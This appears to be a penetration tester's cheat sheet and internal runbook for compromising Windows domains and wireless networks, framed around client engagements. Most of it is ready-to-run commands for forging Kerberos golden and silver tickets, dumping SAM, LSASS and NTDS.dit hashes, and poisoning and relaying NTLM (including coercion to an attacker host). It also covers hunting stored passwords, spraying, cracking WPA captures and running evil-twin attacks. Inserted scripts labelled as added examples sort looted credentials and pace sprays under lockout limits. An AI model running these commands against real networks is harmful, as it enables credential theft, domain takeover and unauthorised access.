mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<service_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

OR

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<service_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

Set Ticket via Windows (2)


#Use the TGS with Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\[Link] ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\[Link] -accepteula \\<remote_hostname> cmd

GOLDEN TICKET
Request The TGT via Linux (1)
[Link]
#Forge the TGT with the krbtgt NTLM hash via impacket

python [Link] -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

#Forge the TGT with the krbtgt AES key via impacket

python [Link] -aesKey <krbtgt_aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

Set Ticket via Linux (2)


#Use the TGT with Impacket

export KRB5CCNAME=<TGT_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR



python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


[Link]
#Forge the TGT with the krbtgt NTLM hash via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

#Forge the TGT with the krbtgt AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

OR

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

Set Ticket via Windows (2)


#Use the TGT with Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\[Link] ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\[Link] -accepteula \\<remote_hostname> cmd



AUTOMATE LOCAL ADMIN TO DOMAIN ADMIN (NOISY)
Initiate Deathstar
[Link]

python empire --rest --username empireadmin --password Password123

[Link]

[Link]

Execute DeathStar

crackmapexec smb [Link] -u username -p password -d domain -M empire_exec -o LISTENER=DeathStar



CREDENTIAL PILLAGING



EXTRACT SAM & CACHED HASHES MANUALLY

Manual Local SAM and Cached Credential Extraction (1)

reg save hklm\sam c:\SAM

reg save hklm\system c:\SYSTEM

reg save hklm\security c:\SECURITY

Reconstruct SAM and Cached Credentials into readable hashes (2)

impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL

EXTRACT NTDS.DIT HASHES MANUALLY

Manual [Link] Extraction using vssadmin (1)

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\[Link] c:\[Link]

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM c:\SYSTEM

Manual [Link] Extraction using ntdsutil (1)

ntdsutil "ac in ntds" i "cr fu c:\temp" q q

Reconstruct [Link] into readable hashes (2)

impacket-secretsdump -ntds ./[Link] -system ./SYSTEM LOCAL -outputfile customer

EXTRACT NTDS.DIT HASHES (AUTOMATED)

Dump [Link] with Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -d domain --ntds



EXTRACT USERS WITHOUT PASSWORD REQUIREMENT
No Password Required

crackmapexec ldap [Link] -u username -p password --kdcHost DC_IP_ADDR --password-not-required

FIND PLAINTEXT PASSWORDS

Automate searching for credentials through email


[Link]

#Searching with non-admin privs

Invoke-SelfSearch -Mailbox notanadmin@[Link]

#Searching with admin privs

Invoke-GlobalMailSearch -ImpersonationAccount notanadmin -ExchHostname exchange

Automate search through SMB and NFS Shares


[Link]

manspider [Link]/24 -f passw -d [Link] -u bob -p Password

[Link]

python3 [Link] smb -t [Link] -u administrator -p Password123 -d [Link]

OR

python3 [Link] smb --target iplist --username administrator --password Password123 --domain [Link] --overwrite

[Link]

crackmapexec smb [Link] -u 'username' -p 'password' -M spider_plus

Extract session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP



[Link]

Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -iL [Link] -u [Link]\admin -p Password123 -o

Search passwords in commonly-used software


[Link]

Run [Link] all on the victim.

Metasploit Post Exploitation

use post/windows/gather/*

Search passwords in files and registry

findstr /si password *.txt

findstr /si password *.xml

dir /s *pass* == *cred* == *vnc* == *.config*

findstr /spin "password" *.*

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

findstr /si password *.ini

dir /b /s [Link]

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" (Windows Autologin)

Crackmapexec

crackmapexec smb -t 150 <target> -u USER -p Password123 --spider Users --depth 10 --pattern password
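Once spider_plus or manspider has pulled files down, the hits still need triage: the findstr and --pattern sweeps above return policy settings, empty values and comments alongside real secrets. The script below is an added example, not part of the guide or of any tool it names; it greps a constructed loot tree for credential assignments, filters that noise, and prints a masked copy that is safe to paste into a report. It assumes GNU grep and sed (as on Kali); the loot files, paths and values are made up for the demo.

```shell
#!/usr/bin/env bash
# Added example, not from the guide: triage credential hits in files pulled
# down by spider_plus (default loot dir ~/.cme/spider_plus/) or manspider.
# Assumes GNU grep/sed.  The loot tree below is constructed for the demo.

LOOT="$(mktemp -d)"
mkdir -p "$LOOT/web" "$LOOT/scripts"
cat >"$LOOT/web/web.config" <<'EOF'
<connectionStrings>
  <add name="db" connectionString="Server=sql01;User Id=svc_web;Password=Sup3rS3cret!;" />
</connectionStrings>
<membership><providers><add minRequiredPasswordLength="8" /></providers></membership>
EOF
cat >"$LOOT/scripts/deploy.ps1" <<'EOF'
$cred = New-Object PSCredential("CORP\svc_deploy", (ConvertTo-SecureString "Deploy2022!" -AsPlainText -Force))
# password policy: see GPO
EOF
cat >"$LOOT/scripts/settings.ini" <<'EOF'
[smtp]
password=
user=mailer
[backup]
password = B4ckup#99
EOF

# A credential assignment: key containing pass/pwd/secret/token, an = or :
# separator and a non-empty value; or a PowerShell ConvertTo-SecureString
# with an inline string literal.
CRED_RE="(pass(word|wd)?|pwd|secret|token)[[:space:]]*[=:][[:space:]]*[\"']?[^\"'[:space:];]+|ConvertTo-SecureString[[:space:]]+[\"'][^\"']+"
# Noise: policy settings, empty values, and comment lines.  grep -rn output is
# file:line:text, so the comment check anchors after the second colon.
NOISE_RE="minrequiredpasswordlength|passwordpolicy|password[[:space:]]*=[[:space:]]*(;|\$)|^[^:]*:[0-9]+:[[:space:]]*#"

# All raw hits under a loot directory, one file:line:text per hit.
find_creds() {
  grep -rniE "$CRED_RE" "$1" | grep -viE "$NOISE_RE"
}

# Same hits with the secret value replaced by asterisks (GNU sed /I flag).
find_creds_masked() {
  find_creds "$1" \
    | sed -E -e "s/((pass(word|wd)?|pwd|secret|token)[[:space:]]*[=:][[:space:]]*[\"']?)[^\"'[:space:];]+/\\1********/I" \
             -e "s/(ConvertTo-SecureString[[:space:]]+[\"'])[^\"']+/\\1********/"
}

# Number of distinct credential lines found (for the report summary).
count_creds() { find_creds "$1" | wc -l | tr -d ' '; }

# On an engagement: find_creds_masked ~/.cme/spider_plus/
find_creds_masked "$LOOT"
```

The three hits (the web.config connection string, the SecureString literal in the deployment script, and the non-empty ini entry) survive; the empty password=, the minRequiredPasswordLength setting and the comment line are dropped. Extend CRED_RE with whatever the customer's stack uses (connection strings, API keys, service account names) rather than widening it to bare "password", which brings the noise back.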

Extract passwords from PST File
Non-Password protected File
[Link]

[Link] -D -S -o output -t ea [Link]

findstr /s /i /m "password" *.*

Password Protected PST File


[Link]

java -jar [Link] -a -f "C:\Users\xxx\[Link]" -i -k "login|password" -o TEST01

Stored User Descriptions


#Sometimes there are passwords or keys stored in descriptions

crackmapexec ldap [Link] -u username -p password --kdcHost DC_IP_ADDR -M get-desc-users

OR

ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip

Stored Passwords in PowerShell History

cat (Get-PSReadlineOption).HistorySavePath

or

cat (Get-PSReadlineOption).HistorySavePath | sls password

or

cat (Get-PSReadlineOption).HistorySavePath | sls accountpassword

WPA PSK STRING EXTRACTION


Windows

netsh wlan show profiles

netsh wlan show profile name=WIFI_NAME key=clear

Look for the "Key Content" line; the cleartext password will be there.

OR

crackmapexec smb <ip> -u user -p pass -M wireless

*NIX

sudo cat /etc/NetworkManager/system-connections/{SSID} | grep psk=

sudo grep psk= /etc/NetworkManager/system-connections/*

OR

sudo cat /etc/wicd/[Link]

WIRELESS

WPA/WPA2 HASH CAPTURE WITH USERS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
[Link]
[Link]

./[Link]

OR

./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) Capture Handshake (option 5)

Run manually

airmon-ng

airmon-ng start wlan0

airodump-ng wlan0mon or airodump-ng -b a wlan0mon

airodump-ng wlan0mon -c 3 -t wpa -d [Link] -w capture

#*-c = channel *-d=BSSID

aireplay-ng -0 1 -a [Link] -c [Link] wlan0mon

#*-a=BSSID *-c=client

WPA/WPA2 HASH CAPTURE WITHOUT USERS (PMKID)


#Will work with a cheap Atheros wireless USB LAN adapter
Automate via Wifite
[Link]

./[Link]

Run manually
[Link]
[Link]

airmon-ng

airmon-ng start wlan0

airodump-ng --ivs wlan0mon

echo "BSSID">[Link]

hcxdumptool -o [Link] -i wlan0 --filterlist=[Link] --filtermode=2 --enable_status=1 -c 1

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 [Link]

WPS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
[Link]

./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select WPS attack menu (option 8)
4) Explore targets (option 4)
5) Run through list (7-13)

ENTERPRISE WIRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
[Link]

./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Enterprise attack menu (option 10)
4) Create company specific certificate (option 5)
5) Select Smooth mode Enterprise Evil Twin (option 6)

Password Spray
[Link]

./eaphammer --eap-spray -I wlan0 -e SSID_EXAMPLE --user-list [Link] --password Summer2019

Password Reuse

If the network authenticates with passwords rather than client certificates, a compromised AD username and password will usually get you on.

EVIL TWIN (SOCIAL ENGINEERING)


#Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
[Link]

./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Evil Twin menu (option 7)
4) Select option 7-9 based on OPSEC requirement

OPEN WIRELESS
Nmap internal IP addresses and/or hostnames.

WEP WIRELESS
#Will work with a cheap Atheros wireless USB LAN adapter
Automate
[Link]
[Link]

./[Link]

OR

./[Link]

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) WEP attack (option 5)

METHODOLOGY

INTERNAL RUN BOOK FOR MOST WINDOWS NETWORKS (QUICK ACCESS)

Asset discovery is generally time consuming, slow and produces lots of network traffic. I often spend the
first 30 min of my time running Responder and mitm6 in an attempt to gain credentials, then move into
authenticated asset discovery.
1) Look for very quick wins before anything else. If these attacks fail, move on to #2.
crackmapexec smb <Domain Controller> -u '' -p '' -M petitpotam
crackmapexec smb <Domain Controller> -u '' -p '' -M zerologon
crackmapexec smb <Domain Controller> -u '' -p '' --users -o [Link]
a. cme ldap [Link] -u [Link] -p '' --asreproast [Link]
b. ./[Link] -m 18200 -O -w 3 ./[Link] /opt/[Link]
c. wget [Link] -O [Link]
d. cme smb <Domain Controller> -u '' -p '' --pass-pol
e. [Link] -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
crackmapexec smb <subnet> -u '' -p '' -M ms17-010

2) Gather hashes. Careful: poisoning can cause certificate issues, among other things, and
potentially DoS users.
responder -I eth0 -Pdv
a. sort -u -t: -k1,1 /usr/share/responder/logs/*.txt

3) Legacy services may be disabled; mitm6 may produce more hashes. I like to use the IP range of
my local subnet. Careful: this can cause certificate issues, among other things, and potentially
DoS users.
crackmapexec smb <subnet> --gen-relay-list [Link]
mitm6 -i eth0 -d [Link]
[Link] -6 -wh $attacker_ip -of loot -tf [Link] -smb2support
a. Check the local directory for hashes and SAM dumps. If a SAM hash is obtained, Pass the
Hash to other domain PCs.
crackmapexec smb <ip> -u admin -H blahblah -M hash_spider
crackmapexec smb <subnet> -u admin -H blahblah --lsa
i. cat /root/.cme/logs/*.secrets | sort -u
crackmapexec smb <subnet> -u admin -H blahblah -M lsassy

4) Crack the hashes. Most of the time you will get NTLMv2 (hashcat mode 5600) hashes in modern
environments. If the hashes do not crack, continue relaying (preferably off hours); relaying to
SMB only works against hosts where SMB signing is not required.
./[Link] -m 5600 -O -w 3 /opt/customer/admin_hash.txt /opt/wordlist/all_wordlists.txt
./[Link] -m 5600 -O -w 3 /opt/customer/admin_hash.txt /opt/wordlist/[Link] -r /usr/share/hashcat/rules/[Link]

#If passwords are cracked, start moving laterally.


5) Figure out roles of each account. We are looking for admins.
crackmapexec ldap [Link] -u username -p password --admin-count
OR
ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip
OR
[Link] --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>
OR
bloodhound-python -u <USERNAME> -p <PASSWORD> -c all
a. cat [Link]|jq -r '.users[] | .Properties |select(.admincount==true) |.name'

6) Are the creds Admin?


a. Are the creds LOCAL Admin?
Automated
crackmapexec smb <ip> -u admin -H blahblah -M hash_spider
Manual
i. I like to make a quick list of hosts to target.
crackmapexec ldap <Domain Controller> -u admin -p password -M subnets
ii. Dump the SAM in an attempt to pass the hash.
crackmapexec smb AD_Computers.txt -u admin -p password --sam
1) Once a hash is obtained, Pass the Hash to other domain PCs.
crackmapexec smb AD_Computers.txt -u admin -H blahblah --lsa
cat /root/.cme/logs/*.secrets | sort -u
iii. Dump LSA secrets in an attempt to escalate privileges.
crackmapexec smb AD_Computers.txt -u admin -p password --lsa
cat /root/.cme/logs/*.secrets | sort -u
iv. Dump LSASS in an attempt to escalate privileges. Note, this often returns more
creds but they are not stored in the DB or in logs.
crackmapexec smb AD_Computers.txt -u admin -p password -M lsassy
b. Are the creds Domain Admin?
crackmapexec smb [Link] -u UserNAme -p 'PASSWORDHERE' --ntds
crackmapexec smb [Link] -u UserNAme -p 'PASSWORDHERE' --ntds vss

7) Are the creds a basic user?


a. Impersonate Domain Admin with noPAC
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M nopac

b. Try the printer bug attack.


crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M spooler
i. python3 [Link] -t DCSYNC://[Link] -smb2support
ii. python3 [Link] -no-ping [Link]/username:password@[Link] <ATTACKERIP>

c. Look for passwords in user descriptions.


crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M user-desc
OR
crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M get-desc-users
d. Make a list of users to password spray. Make sure the password policy is followed.
ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip
OR
bloodhound-python -u <USERNAME> -p <PASSWORD> -c all
cat [Link]|jq -r '.users[] | .Properties |.name' |cut -d @ -f1
i. Execute password spray
[Link] -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
OR
crackmapexec smb [Link] -u [Link] -p 'Summer2022!'
e. Look for privilege escalation attack vectors via AD.
[Link] --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME>@[Link] --password <PASSWORD>
#PingCastle will provide a lot of a results. These are the most common.
i. ASREPRoast
crackmapexec ldap <Domain Controller> -u [Link] -p '' --asreproast [Link]
crackmapexec ldap <Domain Controller> -u username -p pass --asreproast [Link]
ii. Kerberoast
crackmapexec ldap <Domain Controller> -u username -p pass --kerberoasting [Link]
iii. Find autologon information
crackmapexec smb <Domain Controller> -u username -p pass -M gpp_autologin
iv. Abuse AD CS
certipy 'example/john:Passw0rd@[Link]' auto
v. GPP Passwords.
crackmapexec smb <Domain Controller> -u username -p pass -M gpp_password

8) If you can't crack the hashes, relay the authentication instead; NTLMv2 challenge-responses
captured by Responder cannot be passed the way NT hashes can.
a. By default any authenticated user can add up to ten computer accounts (ms-DS-MachineAccountQuota).
Relaying to LDAPS and adding one gives a foothold in AD.
mitm6 -hw icorp-w10 -d [Link] --ignore-nofqdn
[Link] -t ldaps://[Link] --add-computer
b. Combine mitm6, ntlmrelayx and RBCD to abuse AD defaults.
mitm6 -hw icorp-w10 -d [Link] --ignore-nofqdn
[Link] -t ldaps://[Link] -wh attacker-wpad --delegate-access
[Link] -spn cifs/[Link] [Link]/NEW_PC_NAME\$ -impersonate admin
export KRB5CCNAME=[Link]
[Link] -k -no-pass [Link]
c. Relay an SMB authentication request to the DC over LDAPS with the MIC stripped. If the relayed
account is a DA and the DC is unpatched for CVE-2019-1040 (the NTLM MIC bypass that --remove-mic
exploits), ntlmrelayx will create a new DA account.
mitm6 -hw icorp-w10 -d [Link] --ignore-nofqdn
[Link] -t ldaps://[Link] -smb2support --remove-mic

9) Find subnets user/servers are on.


bloodhound-python -u username -p Password123 -c all
cat [Link]|jq -r '.computers[] | .Properties |.name' > [Link]
nmap -p445 -Pn -oG - -iL [Link] | awk '/open/{print $2}' | cut -d '.' -f1,2,3 | sort -u | sed 's/$/.0\/24/'

10) Dump AD subnets.


crackmapexec ldap <Domain Controller> -u 'user' -p 'pass' -M subnets
OR
.\[Link] -username=testuser -password="testpass!" -domain="[Link]" -dc="[Link]" -unsafe
OR
[Link] --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD>
[Link] --hc-conso

11) Dump DNS records and find internal records to avoid going out of scope.
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M enum_dns
OR
adidnsdump -u DOMAIN\\notanadmin <target>

OR
[Link] --Domain [Link] --Username user --Password pass --Choice 1
12) Pillage files for sensitive data to show impact.
manspider [Link]/24 -f passw user admin account network login logon cred -d evilcorp -u bob -p Passw0rd
OR
crackmapexec smb [Link] -u 'user' -p 'pass' -M spider_plus
a. Dump all filenames to your local drive
crackmapexec smb [Link] -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=false
b. Browse to the SMB share. Download for impact.
smbclient '//[Link]/C$' -U Administrator --pw-nt-hash blahblahblah -W [Link]
OR
#Prompt for password.
smbclient '//[Link]/C$' -U Administrator -W [Link]
#ls - lists files
#cd - directories
#mget - download file(s)

13) Look for default creds on network equipment and applications.


cat [Link] | naabu -silent | httpx -silent -c 500 | nuclei -severity critical,high,medium
AND/OR
nmap --script http-default-accounts -iL [Link]
AND/OR
cat [Link] | httpx | ffuf -w - -u FUZZ -mr "assword"

14) Kick off vulnerability scanner to fill any gaps and exploit as needed.
#Need to find low hanging fruit quickly?
Run Nessus file through [Link]

a. Check for issues Nessus does not flag; these are risks worth reporting even if you did not need
to exploit them.
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M dfscoerce
crackmapexec smb <Domain Controller> -u 'user' -p 'pass' -M nopac
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M shadowcoerce
crackmapexec smb <Domain Controller> -u Administrator -p 'Password123!' -M petitpotam
crackmapexec ldap <Domain Controller IP> -u Administrator -p 'Password123!' -M ldap-checker --kdcHost [Link]
crackmapexec ldap <Domain Controller> -u Administrator -p 'Password123!' -M ldap-signing

15) Manually look at each application through a screenshot tool. Check for default creds. Google
vendor passwords if you have internet access.

a. Screenshot web applications


eyewitness -x [Link] --active-scan --web

b. List web apps with a credential page


cat [Link] | httpx -threads 500 -ms "assword"
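Steps 2 and 4 of the runbook above feed Responder logs into hashcat. Responder writes one line per authentication attempt, so the same account appears many times, and `sort -u -t: -k1,1` keys on the username alone, which merges CORP\admin with LAB\admin. The functions below are an added example, not from the guide or from Responder; they key on DOMAIN\user instead and drop anything that is not in the hashcat 5600 shape before the file reaches the GPU. The capture is constructed; the usernames, domains and hash values are made up.

```shell
#!/usr/bin/env bash
# Added example, not from the guide: clean Responder NTLMv2 captures before
# cracking.  The sample capture below is constructed for the demo.

SAMPLE_LOG="$(mktemp)"
cat >"$SAMPLE_LOG" <<'EOF'
admin::CORP:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
admin::CORP:1122334455667788:99dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
svc_backup::CORP:0102030405060708:00dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
Admin::lab:a1b2c3d4e5f60708:11dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
[SMB] NTLMv2-SSP Client   : 10.0.0.5
EOF

# Keep only lines in the hashcat -m 5600 shape:
#   user::DOMAIN:server_challenge(16 hex):NTProofStr(32 hex):blob(hex)
# Anything else (status lines, truncated captures) would make hashcat reject the file.
valid_ntlmv2() {
  awk -F: 'NF == 6 && $2 == "" &&
           length($4) == 16 && $4 ~ /^[0-9a-fA-F]+$/ &&
           length($5) == 32 && $5 ~ /^[0-9a-fA-F]+$/ &&
           $6 ~ /^[0-9a-fA-F]+$/' "$@"
}

# First capture per DOMAIN\user, case-insensitive.  Later captures of the same
# account encode the same password, so cracking them again is wasted GPU time.
dedupe_per_account() {
  valid_ntlmv2 "$@" | awk -F: '{
    key = tolower($3 "\\" $1)
    if (!(key in seen)) { seen[key] = 1; print }
  }'
}

# Number of distinct accounts captured (handy for the report).
count_accounts() { dedupe_per_account "$@" | wc -l | tr -d ' '; }

# On an engagement:
#   dedupe_per_account /usr/share/responder/logs/*NTLMv2*.txt > ntlmv2_unique.txt
#   hashcat -m 5600 ntlmv2_unique.txt /opt/wordlist/all_wordlists.txt
dedupe_per_account "$SAMPLE_LOG"
echo "unique accounts: $(count_accounts "$SAMPLE_LOG")"
```

Four of the five sample lines are well-formed; the two CORP\admin captures collapse to one, while lab\Admin is kept as a separate account, so three hashes go to hashcat. The same DOMAIN\user key is what you want when counting affected accounts for the report.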
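Step 7d of the runbook says to respect the password policy when spraying, and step 1 reads that policy with --pass-pol. The planner below is an added example, not from the guide or from any spraying tool; it takes the lockout threshold and observation window, keeps a safety margin so a user's own typos do not push the account over the threshold, and prints (without running) one crackmapexec command per password with the waits needed between rounds. The domain controller name, user file and policy values are assumed.

```shell
#!/usr/bin/env bash
# Added example, not from the guide: plan a password spray that stays under the
# domain lockout threshold, then emit the crackmapexec commands as a dry run.
# Threshold / observation window come from `cme smb <DC> -u '' -p '' --pass-pol`;
# the values used at the bottom are assumed for illustration.

# Attempts per account that fit in one observation window, minus a margin
# (default 2) for the user's own failed logons.  Threshold 0 means no lockout
# policy; reported as -1 (unlimited).
attempts_per_window() {
  threshold=$1; margin=${2:-2}
  if [ "$threshold" -eq 0 ]; then printf '%d\n' -1; return; fi
  n=$((threshold - margin))
  [ "$n" -lt 1 ] && n=1
  echo "$n"
}

# Rounds needed to try N passwords at K attempts per window.
rounds_needed() {
  n_pass=$1; per_window=$2
  [ "$per_window" -lt 0 ] && { echo 1; return; }
  echo $(( (n_pass + per_window - 1) / per_window ))
}

# Wall-clock minutes: one full observation window of waiting between rounds.
total_minutes() {
  rounds=$1; window=$2
  echo $(( (rounds - 1) * window ))
}

# Print (do not run) the spray.  Passwords are single-quoted so bash does not
# history-expand "!" (Summer2022! unquoted would break); passwords containing
# a single quote would need further escaping.
plan_spray() {
  dc=$1; userfile=$2; threshold=$3; window=$4; shift 4
  per_window=$(attempts_per_window "$threshold")
  rounds=$(rounds_needed "$#" "$per_window")
  i=0; r=1
  for pw in "$@"; do
    echo "round $r: crackmapexec smb $dc -u $userfile -p '$pw' --continue-on-success"
    i=$((i + 1))
    if [ "$per_window" -gt 0 ] && [ $((i % per_window)) -eq 0 ] && [ "$i" -lt "$#" ]; then
      echo "round $r: sleep $((window * 60))   # wait out the observation window"
      r=$((r + 1))
    fi
  done
  echo "# $rounds round(s), about $(total_minutes "$rounds" "$window") minutes"
}

# Dry run with an assumed policy: threshold 5, observation window 30 minutes.
plan_spray dc01.example.local users.txt 5 30 'Summer2022!' 'Winter2022!' 'Password1' 'Welcome1'
```

With threshold 5 the planner allows three attempts per window, so four passwords take two rounds with one thirty-minute wait between them. Feed it the real --pass-pol values and the user list from step 7d; if --pass-pol reports a threshold of 0, there is no lockout and the planner emits no waits.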

Thank You for Your Contribution
• @Derek_Carlin
• @_dirkjan
• @byt3bl33d3r
• Rjohnsondev
• @netbiosX
• AlessandroZ
• @arvanaghi
• Nikallass
• @agsolino
• @PythonResponder
• @gentilkiwi
• @harmj0y
• @mysmartlogon
• Atom
• @xerosecurity
• @ztgrace
• Folks at SySS Research
• Contributors to Metasploit
• @bonsaiviking
• @ErrataRob
• x90skysn3k
• @DanHMcInerney
• @derv82
• @s0lst1c3
• @mpgn_x64
• @nixfreax
